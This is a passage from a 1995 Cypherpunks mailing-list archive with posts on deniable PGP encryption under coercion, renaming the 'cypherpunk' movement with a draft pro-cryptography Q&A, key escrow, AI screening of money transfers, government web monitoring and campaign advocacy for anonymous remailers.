| +---------+---------------------------+--------------------+--------+ the IDEA block has a length field, but you can increase the length without damage to include the following stealthed stuff as the underlying stuff which is IDEA encrypted will know it's length on decryption, and the following junk will just be discarded. So, Alice and her secret key ring (encrypted) gets nabbed by the Charlie (CoS?), and coerced into divuling her passphrase. And if and when it is noticed that the message was longer than it ought to be (CoS that smart? substitute the NSA and they'd notice for sure), Alice explains away the junk on the end by pointing them to the fact that all of her messages where exactly (say) 16k long, and that she was using a the noise only script, and that the message really is this: +---------+---------------------------+-----------------------------+ | pgp hdr | IDEA encrypted duress msg | noise | +---------+---------------------------+-----------------------------+ Having this built-in to PGP provides plausible deniablity as you have no extra software which might look incriminating unless you managed to dispose of it first, if it comes as stock. Even as a standalone it would be feasible, but you'd need to be careful to hide the first script, maybe on an encrypted drive or something. This is not good tho as you ideally want nothing left, just a standard pgp implementation, and they have no way to prove anything, they can be suspicious, but suspicion can't put you in jail, and if you say there is no message, only random junk for padding purposes to foil traffic analysis this would be plausible, especially if they really had captured a whole load of 64k messages. You really need to use stealth2 for that, as stealth1.x gives the game away for determined attackers, but for stealth2, I need some cryptographic opinions on whether this is secure: 0 < x < N N is RSA modulus, and converting that to a number x' in the range: 0 < x' < 2^(int(log2(N) + 1) + 64) (ie the next power of 2 over N multiplied by 2^64) and the transformation supplied by: x' = N * f(MD5(x)) + x where f(y) is a function which converts from range 0 <= y < 2^128 to a range 0 <= f(y) < scale. Scale some constant defined in terms of N, and n other randomisation. Is that safe? x is random, and will be different even for a repeat encryption of the same file, as PGP is using a random IDEA session key. So are there any brute force attacks on that which would be cheaper than attacking 128 bit IDEA? PGP's random number generator also makes extensive use of MD5, so I'm taking the use of MD5 as secure as a given. If it is thought to be dangerous for some reason (it is after all some kind of signature on it's self, presume that you know N, and x' but not x, the question is can the equation be brute force reversed in a less than 128 bit brute force attack. I'm neglecting to consider the rand() calls, which I'm not expecting to add security, but are just a mechanism to stir the value with to get more random nos, as occasionally the alogrithm needs more than one, if the first fails, etc. The other approach, presuming that you can get to the data before they can, is to use secure drive, and securely wipe (or physically destroy - data on floppy) the encrypted key. Then you can give your passphrase without concern. Could land you in trouble for destruction of evidence or some such tho, so innocent, plausible deniability would be better. Adam From trei at process.com Wed Sep 13 07:34:42 1995 From: trei at process.com (Peter Trei) Date: Wed, 13 Sep 95 07:34:42 PDT Subject: CYPHERPUNK considered harmful. Message-ID: <9509131434.AA23717@toad.com> I mailed this yesterday, but it never showed up on the list. -----BEGIN PGP SIGNED MESSAGE----- V Z Nuri has actually stolen my thunder a bit here, with his post on 'crypto confrontation', but I've been working on this stuff since Friday. I have a somewhat different approach, and I'd like to see some comment. "CYPHERPUNK" considered harmful I would like to propose that we, the 'cypherpunks', are making a strategic error, which will make it far more difficult to achieve the goal we share. I realize that many will bridle at the notion that we have a common goal, but I think that most of the participants in this list will agree with the following: "Strong cryptography is a powerful new technology, of which the widespread and unfettered use should be encouraged." Our error lies in our approach to encouraging the widespread use of crypto. It is an error of hubris - overweening pride. We too often think of ourselves as an elite - smarter and better in various ways to our non-cpunk neighbours. We refer to these others as 'Joe Sixpack" and other such derogatary terms. The problem is that in doing so we are marginalizing ourselves. We call ourselves 'cypherpunks'. While this is derived from the SF term 'cyberpunk', consider the image we are creating for ourselves: A 'punk' is a marginalized young adult, one who rejects the norms of his or her society, and takes delight in irking those around him with his or her rejection. The older of us will think of James Dean in 'Rebel Without a Cause', or Brando in 'The Wild One'. Later, you get images such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and other icons of the 'punk rock' movement. These punks are often romantic figures, but in reality they started marginalized, remained marginalized, and died marginalized. They were ineffective in changing the core values of the society in which they lived (yes, I know that most the examples I've given are fictional characters, but I'm talking about the type of people they are modeled on). We, the 'cypherpunks' have embraced this label, taking pride in our technical abilities, and acting as if we can institute 'cryptoanarchy' without getting a majority of the population to support us. This is a bad approach. The overwhelming majority of the US population is not alienated from the US government, and regards with suspicion those who are. I suggest that we drop the term 'cypherpunk' - it has the wrong connotations to get our ideas into the mainstream. I don't have a perfect replacement yet: 1. I want to get away from the strings 'crypt' and c[iy]pher- they sound too cloak-and-dagger. 2. It should imply that the labelees are level-headed, responsible citizens, not longhaired weirdos. 3. It should make itself difficult to invert - the classic example is the pro-choice/pro-life dichotomy, where each side refuses to acknowledge the other's terminology. 4. A cute and apropos acronym would help. Many on this list have been advocating cryptography primarily as a means of liberating ourselves from an intrusive and overcontrolling state. This is a goal that leaves most Americans cold - they correctly regard their country as one of the most free in the world, and are alarmed by people who want major changes in the status quo. To get crypto accepted into the mainstream, we need to make it something the average person expects and wants to use, for goals that make mainstream sense - not for some distant, idealist utopian cryptoanarchic libertarian dream. Crime is a major political hot button these days. Advocating crypto for preventing crime is probably the best approach we have to getting the meme into the mainstream's ear that "I need good crypto". - -------------------------------------------------------------- Towards this goal, I have written a short Q&A that could be used as a model when discussing cryptography with non-cypherpunks. These are UNFINISHED DRAFTS. I would welcome additions, corrections, completions, and modifications. Please do NOT repost to other locations until they are finished. I'm trying to avoid wild anti-state tirades, giving mainstream reasons for people to take pro-cryptography positions. - ------------------------------------------------------------- Q: Why should I use cryptography? A: To protect yourself against crime. Criminals have already been caught installing "sniffers" on the Internet, and capturing passwords and other data. Cryptography will protect you from this. It will also protect your company against industrial espionage, and reduce fraud by providing unforgeable and undeniable digital signatures. Cell phone companies currently pay $XXXX million every year due to cellular fraud. This vast level of crime could be reduced to near zero by cryptography, with a corrosponding reduction in cellular rates. On top of this, a great deal of crime is committed by tapping cell phone conversations - something that can be done by any teenager (or gangster) with a simple scanner. Even the British royal family have had their privacy invaded by this method. Encryption can protect your phone conversations, and make them as private as regular phones. Finally, strong encryption can make the Internet safe for commerce and trade. [We need more data on the 'sniffer' attacks which have occurred - I know there was one on BARRNET about a year ago, and I understand that there have been others]. Q: Won't criminals be able to evade wiretaps by encryption? A: In theory they could. However, the FBI has not reported a single case where cryptography has been a barrier to wiretaps [I think this is correct - any counters?]. It turns out that criminals have not been using strong cryptography. Even if they did start to do so, audio and data bugs can still be planted. Criminals *have* been tapping the unencrypted data that flows through and is stored on the Internet, and tapping cell phone transmissions to commit cellular fraud. Encrypting your data and communications will help protect you against them. Q: Aren't LEAs worried that strong encryption will make it more difficult for them to catch crooks? A: There's an old saying that's apropos here: "When you're up to your ass in alligators, it's easy to forget that you're trying to drain the swamp." The reason we have LEAs is not to catch crooks; their purpose is to prevent crime. Catching crooks is simply one method of doing so. Cryptography provides a method of preventing crime before it happens, and putting the crooks out of business. To give a couple of analogies: 1. If your house was strongly built, and no one could enter without your consent, you would not worry about burglery. If every house was similarly robust, burglers would be out of a job. 2. Similarly, if your car could not be broken into, damaged, or moved in any way without your cooperation, you would not worry about car theft, or pay for theft insurance. If all cars were similarly protected, car theft and carjacking would no longer exist as crimes. LEAs tend to focus on the small number of investigations which may be hampered by good cryptography, ignoring the vast number of crimes which would be prevented by the same technology. This is a classic example of failing to see the forest for the trees. The widespread use of cryptography would reduce crime to a point where many LEA employees could retire. Q: What's this 'key escrow' thing? A: Some government agencies have been trying to figure out methods which simultaneously permit US citizens to use strong cryptography against criminal eavesdroppers, while retaining the ease with which LEAs can currently tap your calls. The schemes generally involve something mistitled 'key escrow', in which copies of cryptographic keys would be stored at sites accessible by LEAs. Q: Why do you object to it? A: This is a bit as if your local police department ordered you to send them copies of all of your house, car, and office keys, so that they could enter whenever they felt it warranted, without your knowledge. Even assuming no keys will be leaked to criminals from such a valuable archive, it's an incredible boondoggle. The inital cost is tens of millions of dollars per year, by the most conservative government estimates. In reality, it's likely to be hundreds of millions a year, all to enable LEAs to investigate a type of crime which does not yet occur, and may never occur. Q: But isn't escrow required only for export [like I said, I haven't finished] - ------------------------------------------------------ Cute signature quotes are needed. example: I lock my house. Don't you? I lock my car. Don't you? I lock my data. Do you? Use cryptography to protect yourself against crime. - ------------------------------------------------------ Up to this point, I've been an advocate of crypto without using it for much of anything - a classical case of 'I don't have anything that needs it'. I'm going to start clearsigning my messages with PGP. My new key is is included here, and has been put on the MIT server. No signatures yet (sorry I didn't get together with Perry in Danvers). Here's my key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzBST7QAAAEEAMs3b6h0lmwbELWbwoVwBVTInb3Gt0YWSamxbC/DJZ4YHqCh 2+aFZKGGlRfoaAeUeus/Vf0oLffwBMmXspSp86P1Nbk/jlR3TdwTqZA4BpcsylF9 68hJYQjrqQRoibXNyNc6O6/yyqm0MUkE1zcZAM3mW0dGV4d5+1QxhKXe9s8VAAUR tB1QZXRlciBHLiBUcmVpIDxwdHJlaUBhY20ub3JnPokAlQMFEDBSUEJUMYSl3vbP FQEB9Z4D/i2vJclQg4iCnHq1H02DR7az533GoRlxWIjOXd/Y1HrxSyFWcA6zTRM1 8FVFPJw4vL0qbynyCXKKTSmN4kzfSSN/Tt60UKy7i3DWZIL6J0kQIbNUxt6mMB76 4Qk3yFWebf14hg7w3e42Hngf6Nw0ZGjLdLieSlixFgg3CAFXmWVa =DsOh - -----END PGP PUBLIC KEY BLOCK----- KeyId = DEF6CF15 Key fingerprint = 07 4A 45 4E 09 F8 30 1F 78 97 AD 18 24 4E 19 E3 I'm signing this with 'pgp -sta' on a Windoze NT machine. Could someone check the sig and tell me if it computes? Thanks, Peter Trei - ------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFXLXFQxhKXe9s8VAQEhewP9GFus8GXNygG3rjQqrx1uIW6Cb2QxtMZG igKwDaSZQpp3a9Q8oQfSCbK6da6TotOOSZhI9EYG6Es31eoDhyomn2HR/Bompocl hmkQgMqasJW37Rs1/Vw4uBfdoq0o0FiC8jLkvSj7j+pDP6FB890pWzTtEJ+t+Hqd au6NALhGo14= =jTar -----END PGP SIGNATURE----- gah - pgp has munged the dashed lines for the pubkey. Here it is again: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzBST7QAAAEEAMs3b6h0lmwbELWbwoVwBVTInb3Gt0YWSamxbC/DJZ4YHqCh 2+aFZKGGlRfoaAeUeus/Vf0oLffwBMmXspSp86P1Nbk/jlR3TdwTqZA4BpcsylF9 68hJYQjrqQRoibXNyNc6O6/yyqm0MUkE1zcZAM3mW0dGV4d5+1QxhKXe9s8VAAUR tB1QZXRlciBHLiBUcmVpIDxwdHJlaUBhY20ub3JnPokAlQMFEDBSUEJUMYSl3vbP FQEB9Z4D/i2vJclQg4iCnHq1H02DR7az533GoRlxWIjOXd/Y1HrxSyFWcA6zTRM1 8FVFPJw4vL0qbynyCXKKTSmN4kzfSSN/Tt60UKy7i3DWZIL6J0kQIbNUxt6mMB76 4Qk3yFWebf14hg7w3e42Hngf6Nw0ZGjLdLieSlixFgg3CAFXmWVa =DsOh -----END PGP PUBLIC KEY BLOCK----- Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From hfinney at shell.portal.com Wed Sep 13 07:35:26 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 13 Sep 95 07:35:26 PDT Subject: GAK/weak crypto rationale? Message-ID: <199509131434.HAA09918@jobe.shell.portal.com> Responding to msg by futplex at pseudonym.com (Futplex) on Wed, 13 Sep 2:11 AM >Your paraphrase of Nelson's statement strikes me as >remarkable. Doesn't "we are not concerned with bad >people using crypto among themselves" run completely >counter to all the hyperbole about terrorists planning >OKC II with PGP ? Does anyone have an exact quotation >? At any rate, sign me up as a "bad person".... I think this is setting up the rationale for software key escrow. One of the big loopholes in this idea has always been that it would be easy for bad guys to superencrypt or otherwise bypass the legal encryption. The response has been that the systems will be designed so that compliant systems will not interoperate with rogue systems. And the counter-response to that was that criminals (and privacy advocates) would use software which would operate compliantly with conventional programs and maintain privacy when talking to other rogue programs. This new line will be used to respond to this argument, I think. Even if it is admitted that there is no way for the government to be able to tell what the criminals say amongst themselves, it will still be useful to be able to tell what they say to other people. Therefore software key escrow will be argued to still be useful even though it can be defeated. Hal From hfarkas at ims.advantis.com Wed Sep 13 07:46:06 1995 From: hfarkas at ims.advantis.com (Henry W. Farkas) Date: Wed, 13 Sep 95 07:46:06 PDT Subject: Scientology tries to break PGP - and In-Reply-To: <199509131332.JAA29256@detroit.freenet.org> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 13 Sep 1995, David R. Conrad wrote: > And the idea is that on decrypting with the 'wrong' key, it outputs the > dummy file rather than the real plaintext, correct? I'll say it again. :-) PGP could allow for an alternate secret key and a standard "dummy" document from somewhere in your path. A command line option would encrypt for both keys (as if there were 2 recipients) and append the "dummy" document to the end of the target file when encrypting. If decrypted with the "alternate" or "fake" secret key, the encrypted file is wiped until it reaches a marker; the remainder of the file is displayed. If you use your "primary" or "real key", the extraneous text is simply stripped. Alternately, the "dummy" file could overwrite the "real" message n times, to keep the decrypted file size more realistic. > Why would they use your copy of the program to decrypt the file? They > could just use a version that lacked this 'feature'. A good point. A new version of pgp would have to be incompatible with older versions. That's a Very Big Hassle, I know. But consider the advantage. Nobody who has your secure key can prove that it's not the "real" secure key and that the decrypted file is not the real plaintext. They may "know" it but they can't prove it. All they can do is force you to hand over *-a-* key that will decrypt the file. > Of course, they > still couldn't get at the real plaintext unless you gave them the key, > but you are right back to the same old standoff where they say, "Give > us your key," and you (try to) say, "No." Well yes, that is the point I'm trying to address. The key you finally give them *is* your secure key. Just not the key under the blender. They will have a hard time arguing "But that's not what the file *really* said and, deep inside of me, I know it!". I say again: All they can do is force you to hand over *-a-* key that will decrypt the file. "You cannot force a mind." - J. Galt - =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas at ims.advantis.com |------------------------------------------------ hfarkas at vnet.ibm.com | http://newstand.ims.advantis.com/henry henry at nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers. - --------------------------------------------------------------------------- Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not fast, but it's not bad, and we're cheaper than the guy down the street!" =========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta iQCVAwUBMFbufqDthkLkvrK9AQEl/AP+I++gw4+zs3TBMbmLZTrydX+EQ/eJ0mX2 IxldmyS7raU1y2jGo+K3M3NYYQMmY0D9+HGKpvJef4p8GRQ6/R4beMAqsOUNgN+h fgIt9Szf7+gVdmJas8Nu5RmFEV9l4pieoSvHfQuQnMl++BEPJ7/13vG+E22Bf5bs tbxy1VZX4QI= =itux -----END PGP SIGNATURE----- From jya at pipeline.com Wed Sep 13 07:48:17 1995 From: jya at pipeline.com (John Young) Date: Wed, 13 Sep 95 07:48:17 PDT Subject: FUZ_fat Message-ID: <199509131448.KAA18880@pipe5.nyc.pipeline.com> 9-13-95. W$Japer: "Software May Dry Up Money Laundering." Can artificial intelligence be used to combat crime by ferreting out money laundering? Officials at law enforcement, defense and intelligence agencies like to think so. They have suggested creating a sophisticated computer program to screen records of the more than 700,000 electronic money transfers involving U.S. institutions each day and to flag suspicious ones for further investigation. By using AI, they hope to stop some of the $300 billion in profits from drug deals and other illegal activities that they estimate is laundered world-wide each year. But in a report issued yesterday, the congressional Office of Technology Assessment says any such plan would face considerable obstacles. [Cyberian Joel Reidenberg, an OTA advisor, is quoted.] FUZ_fat From m5 at dev.tivoli.com Wed Sep 13 07:57:34 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 13 Sep 95 07:57:34 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: <9509131434.AA23717@toad.com> Message-ID: <9509131453.AA31340@alpha> Some comments (and note that I've just cleaned my white board, so I may not be thinking too rationally): Peter Trei writes: > "Strong cryptography is a powerful new technology, of which the > widespread and unfettered use should be encouraged." > > Our error lies in our approach to encouraging the widespread use of > crypto. It is an error of hubris - overweening pride. Hmm... I don't think I completely agree with this; on the contrary, the "senior members" of the list seem generally quite open and understanding of the issues re cryptography for the general public. > We too often think of ourselves as an elite - smarter and better in ^^ [ careful here... ] > various ways to our non-cpunk neighbours. We refer to these others as > 'Joe Sixpack" and other such derogatary terms. > > The problem is that in doing so we are marginalizing ourselves. > > We call ourselves 'cypherpunks'. While this is derived from the SF > term 'cyberpunk', consider the image we are creating for ourselves: > > A 'punk' is a marginalized young adult, one who rejects the norms > of his or her society, and takes delight in irking those around him with > his or her rejection. The older of us will think of James Dean in 'Rebel > Without a Cause', or Brando in 'The Wild One'. Later, you get images > such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and > other icons of the 'punk rock' movement. I actually consider this a feature. With a "straight" name for the organization, like "International Cryptographic Interest Society" or something, we run the risk of being co-opted into the "mainstream" without even realizing it. There's nothing wrong with being a punk, remember. That the word is weighted simply means that people have to overcome prejudice. Indeed, much of the motivations for boosting cryptography is to protec the rights of every individual to be opt out of conformity. If everyone were normal & mainstream, who'd care about hiding anything? What's to protect? > These punks are often romantic figures, but in reality they started > marginalized, remained marginalized, and died marginalized. They were > ineffective in changing the core values of the society ... Whoooa there; can you really say that? Can you really say that as society absorbs marginalized fragments of the culture that there's not a significant adjustment? In 1955, if I walked down the street with tussled hair, a white t-shirt covered by a ratty leather jacket, and messy jeans, I'd be an "obvious" criminal delinquent; now, I'd be in a Calvin Klein add. There's certainly a profound effect on culture wrought by the mere existance of fringe groups, particularly if the groups can gain access to media. > We, the 'cypherpunks' have embraced this label, taking pride in our > technical abilities, and acting as if we can institute 'cryptoanarchy' > without getting a majority of the population to support us. I think again that this is a generalization over the membership. Some do feel that way, and some don't; I think what you said above about the uniting factor of wanting to see cryptography popularized is accurate, and that's the theme that binds us together (if anything does). > This is a bad approach. The overwhelming majority of the US > population is not alienated from the US government, and regards with > suspicion those who are. I wonder about that assertion. > I suggest that we drop the term 'cypherpunk' - it has the wrong > connotations to get our ideas into the mainstream. I don't have a > perfect replacement yet: > > 1. I want to get away from the strings 'crypt' and c[iy]pher- they sound > too cloak-and-dagger. That idea seems pretty much a fundamental one to be attacked in any effort to popularize cryptography. > 2. It should imply that the labelees are level-headed, responsible > citizens, not longhaired weirdos. Again, I think that making a strong statement every time the name of the organization has to be read aloud by a newscaster is a feature. > 3. It should make itself difficult to invert - the classic example > is the pro-choice/pro-life dichotomy, where each side refuses to > acknowledge the other's terminology. Is "cypherpunk" invertible? > 4. A cute and apropos acronym would help. ... Sorry, I have to quit now; I need to borrow a fan before the fumes knock me out. In summary, I think your concerns are valid, but I'd hesitate to do something radical like change the list name. After all, think of all the mail filter files that'd have to be fixed :-) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From patrick at Verity.COM Wed Sep 13 08:01:18 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Wed, 13 Sep 95 08:01:18 PDT Subject: Digital Fingerprinting Message-ID: <9509131457.AA17323@cantina.verity.com> > > > Then, in W.Ky., as in Stockbridge, "You can get > > anything you want..."? :) > > I'd stick with: > *********************************************** > You can't always get what you want 1 > but if you try > sometimes, sometimes you get what you need. 2 > *********************************************** > > 1 ability to dump garbage where you want > 2 a better appreciation for the environment > :-) Why do I feel like I'm sitting on the group W bench? Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From rsalz at osf.org Wed Sep 13 08:01:54 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 13 Sep 95 08:01:54 PDT Subject: Recent articles Message-ID: <9509131501.AA04394@sulphur.osf.org> Jon Bentley's column in this month's Unix Review talks about protecting data. As with all this columns, it's short but manages to touch on a large number of issues; in this case, using page faults to guess passwords, threat models, and so on. Upside, "The Business Magazine for the Technology Elite" (http://www.upside.com) has an interview with Jim Clark that took place two weeks before the IPO. He discusses in a couple of places how using crypto over the Internet is critical for businesses that can't afford private nets, and how this is an important part of their business plan. (Prof Froomkin: Upside also has an article on "ITEF infighting" you might want to read.) /r$ From hallam at w3.org Wed Sep 13 08:19:14 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 13 Sep 95 08:19:14 PDT Subject: Whitehouse "dissident" and net monitoring In-Reply-To: <199509131202.AA15294@personal.eunet.fi> Message-ID: <9509131518.AA22994@zorch.w3.org> >> >(4) Is the April 9 statement by David Lytel of the White House Office of >> > Science and Technology to Amy Bauer of Copley News Service that the >> > administration does not monitor anti-Clinton activity on the web still >> > operative? >Probably they do and they really should. If I was Mr. Clinton (which >I luckily am not) I would want my adjudats to prepare a report for >me each morning summing up all the possible comments round >subject Clinton and The USA from NET: That would be very precisious >source of feedback to finetune your acts. And that information >is real time. Nope they don't the Democratic party aides do that type of work from Democrat HQ. The President gets a once a week summary of all the mail he gets including the email. I think they also provide a daily press digest. By monitoring Lytel was probably thinking about installing net sniffers etc or obtaining the data from the FBI or whoever. I am certain he didn't mean to say that he does not surf the net ever and does not occasionaly visit opposition sites. The term monitor implies an organised search and continuous checking proceedure. the number of hits cited sounds more like somone passed round the URL of a kook site inside the office. Phill From patrick at Verity.COM Wed Sep 13 08:42:57 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Wed, 13 Sep 95 08:42:57 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: <9509131539.AA17341@cantina.verity.com> > > Sure. I'll respect their privacy as much as they, and the > organizations they oversee, respect mine. I'll use as the > respresentative organizations the IRS and the Social Security > Administration, which respects my pricvacy so much that they use > prison inmates to process paperwork. > > If I was in a nasty mood, I'd add the USPS. > > Sarcasm aside, they show no interest in other people's > privacy. Why should we go out of our way to do anything but show them > how bad the situation is? > > Adam Oh please! Some clerk browses the internet and you don't want to respect their privacy because of the IRS? This makes sense how? I suppose that you're going to dig up information about me and spread it around the internet because you have issues about the company I work for? Suppose someone did something bad to you and justified it by saying that harvard is an elitist school that once did something bad to their uncle. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From asb at nexor.co.uk Wed Sep 13 08:50:17 1995 From: asb at nexor.co.uk (Andy Brown) Date: Wed, 13 Sep 95 08:50:17 PDT Subject: Scientology tries to break PGP - and In-Reply-To: Message-ID: On Wed, 13 Sep 1995, Henry W. Farkas wrote: > If decrypted with the "alternate" or "fake" secret key, the encrypted file > is wiped until it reaches a marker; the remainder of the file is > displayed. If you use your "primary" or "real key", the extraneous text > is simply stripped. Useless I'm afraid. They have the source code and have disabled your "feature" and attached loud alarm bells to it. - Andy From frissell at panix.com Wed Sep 13 08:51:21 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 13 Sep 95 08:51:21 PDT Subject: Software vs Money Laundering Message-ID: <199509131549.LAA22502@panix.com> At 10:48 AM 9/13/95 -0400, John Young wrote: > Can artificial intelligence be used to combat crime by > ferreting out money laundering? Officials at law > enforcement, defense and intelligence agencies like to > think so. They have suggested creating a sophisticated > computer program to screen records of the more than > 700,000 electronic money transfers involving U.S. > institutions each day and to flag suspicious ones for > further investigation. By using AI, they hope to stop > some of the $300 billion in profits from drug deals and > other illegal activities that they estimate is laundered > world-wide each year. But in a report issued yesterday, > the congressional Office of Technology Assessment says > any such plan would face considerable obstacles. > [Cyberian Joel Reidenberg, an OTA advisor, is quoted.] > Not the least of which is that money launderers can use "AI Software" to generate a stream of real and dummy money transfers that emulates "normal" money transfers. Not to mention the fact that monopoly money transfer networks that can be surveilled by the Feds (FEDWIRE and SWIFT) are not long for this world. They will be replaced by encrypted, open, net-based systems. DCF "Yes Virginia, one *can* have an encrypted, open system. In fact, that's the best way to have an open system." From frissell at panix.com Wed Sep 13 08:57:53 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 13 Sep 95 08:57:53 PDT Subject: Web Proxy Servers Message-ID: <199509131531.LAA18512@panix.com> At 10:26 PM 9/12/95 -0400, hallam at w3.org wrote: >If they ever want an anonymous proxy server they are wellcome to use ours. So where's a pointer to it? Others might be interested. Even willing to pay. DCF From dcl at panix.com Wed Sep 13 09:10:59 1995 From: dcl at panix.com (David C. Lambert) Date: Wed, 13 Sep 95 09:10:59 PDT Subject: An opportunity not to be missed Message-ID: <199509131610.MAA26686@panix.com> -----BEGIN PGP SIGNED MESSAGE----- It has occurred to me with the approach of the presidential campaign in the US (and its attendant press frenzy), that there is an an unprecedentedly vast opportunity to bring certain items on the cypherpunk platform into the public spotlight. There are two planks of this platform that I believe: 1. would benefit from this exposure; 2. would be relatively easy to inoculate among the press and/or the candidates (actually, inoculation of the candidates, with subsequent propagation by the rabid campaign press). The first of these has to do with net.censorship, and formal recognition under law of ISPs' common carrier status. The second concerns remailers. I'll deal with each in turn. I believe that, given the hunger of the candidates for as much exposure as possible, that one of them might be persuaded to take a part in the Scientology fracas. (This would have to happen fairly soon, since it looks like the Church is losing some major battles lately - the brand new news from Denver re:FACTnet and the ruling in VA concerning Arnie Lerma and the Washington Post). The desirable features of such a candidate might include: a certain amount of current power, marginal current press exposure, fairly deep pocketed financing, an anti- regulatory stance, and a smidgeon of net awareness. It should be fairly straightforward to convince such a candidate that: 1. there would be tremendous increase in exposure due to the songs of praise from netizens (whose influence is most likely to be overly discounted by campaign strategists, IMHO, at this point in time), and from the mainstream press (especially Time magazine and the Washington Post, for obvious reasons). 2. that the exposure would be worth the peril of inviting the wrath of the Church . The payback of the press coverage of such a candidate would be infection of John Q. Public with the idea that ISPs are no more responsible for content of carried messages than the phone company, and an anti-censorship stance that does not make him (John Q.) pro-porn. This last is a huge flaw in the current battle for free speech on the net, IMO. (Thank you Marty Rimm.) If this issue could be refocused, I think that John Q. (and Jane) would find it much easier to support. The second plank that could be potentially advanced is anonymity. Anonymous remailers in particular, but the benefits of anonymity to users of the Net in general as well. I propose that we get some likely candidate (actually, a similar candidate to the one above) to advocate the benefits of anonymity on the net. The "spin" that would have to be used would depend on the particular candidate, but let's for example we have: Candidate Posturing Required Spin ----------------------------------------------------------------- Pro-business, tough on crime anonymous crime tip e-mail a la Fed whistleblower stuff, and the SPA Pro-choice, womens' vote anonymous support services Of course, there are many more examples, but we'd have to see which postures this campaign's candidates are going to pick. Of course, I am somewhat cynical in my advocation of the particular "Required Spins" (the SPA support, especially), but I feel that the threats to privacy and public use of strong encryption (which walks hand in hand with the use of the remailers, naturally) are worth the potential risk on other fronts (the burgeoning software patent silliness, eg). You may ask why these candidates would be interested in this type of thing, and my response is that they can be forced. The religious right has no problem bringing their agenda into the public spotlight and forcing their issues onto candidates because of their willingness to use hyperbole and fanaticism (not to mention pressure on advertisers and other sponsors). I believe that netizens in general, and cypherpunks in particular can bring similar, and more reasoned, pressure to bear. I think that our job is easier than the religious right because it should be trivial to enlist the support of the mainstream press on these issues, and to direct the anti-federal ire that has been building in the US. In addition, Democratic candidates that are currently in office would love to have some way of attacking the Republican plans for this session of Congress. An attack on net.censorship via the CDA and the telecomm bill could be seen as the ideal place to attack the Republican agenda, and thereby the success of Republican candidates in the presidential race. Let the flames begin. - - David C. Lambert dcl at panix.com (finger for public key) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFcB+qpplsfgM88VAQFdewP9G0aHVTweUeCMa7J7Xhtu2R4cID6yP/J3 7WS5OicRWfl/hPRXj1Db74A9tDrkStEfobbL/2H6CsO9N4wZNgcDLQAa5MjX8ujf 0EF6v57nlcANb1qLJ5kmwfGj96PUMDtw00409tin3KssRAL0uz/lL9SWP/Mhj9q5 emZHYW3VC3c= =bTsO -----END PGP SIGNATURE----- From anonymous at freezone.remailer Wed Sep 13 09:11:42 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Wed, 13 Sep 95 09:11:42 PDT Subject: Dirty Pix Ad Message-ID: <199509131611.MAA28295@light.lightlink.com> Financial Times, Sept 13, 1995. Scientist urges action on Internet pornography By Clive Cookson Pornography accounts for about half of non-academic use of the Internet, the global computer network, the British Association science conference heard yesterday. Prof Harold Thimbleby, professor of computing research at Middlesex University, said most parents, politicians and educators had no idea how easy it was to find graphic descriptions of horrific perversions, through any personal computer linked to the net. "If you want to know about any perversion, you can find full details," Prof Thimbleby said, "and they are described in deceitful and evil ways." He was particularly upset by Internet porn sites that masquerade as victim support groups, such as those for child abuse that tell paedophiles how to entrap children. "I have found text, film and sound material that I find extremely disturbing, for example instructions for killing minors for sexual gratification." Prof Thimbleby has been researching the pattern of traffic on the Internet since the beginning of the year. It is impossible to monitor how more than a tiny fraction of the estimated 30m to 40m users utilise the net. But Prof Thimbleby analysed a representative sample of "bulletin boards" and of searches made via so-called "web crawlers" which act like telephone directories for the World Wide Web, the fastest growing part of the Internet. He said his conclusion - that pornography accounted for about 50 per cent of the searches - tallied with recent US findings about the dominance of porn on the net. "There is no reliable way, technical or otherwise, to detect or intercept pornography," Prof Thimbleby said. Censorship of the Internet was impossible, because pornographers could easily disguise their material. And censoring programs such as SurfWatch and Internet Filter could not cope with all the fast-changing pornographic material. Because censorship was technically and politically 